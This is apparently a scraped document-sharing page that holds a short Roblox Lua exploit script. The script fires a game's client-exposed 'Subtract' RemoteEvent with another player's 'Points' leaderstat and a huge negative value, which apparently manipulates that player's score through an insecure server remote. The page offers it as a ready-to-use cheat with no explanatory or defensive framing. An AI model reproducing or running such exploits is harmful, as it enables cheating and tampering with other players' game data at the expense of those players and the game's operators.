Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 1

local user1 = 'theiruser'

local user2 = game.Players.LocalPlayer.Name

local args = {
[1] =
game:GetService("Players"):WaitForChild(user1):WaitForChild("leaderstats"):WaitForC
hild("Points"),
[2] = -900000000000000000
}

game:GetService("Players"):WaitForChild(user2):WaitForChild("PlayerGui"):WaitForChi
ld("Stats"):WaitForChild("Frame"):WaitForChild("Subtract"):FireServer(unpack(args))

You might also like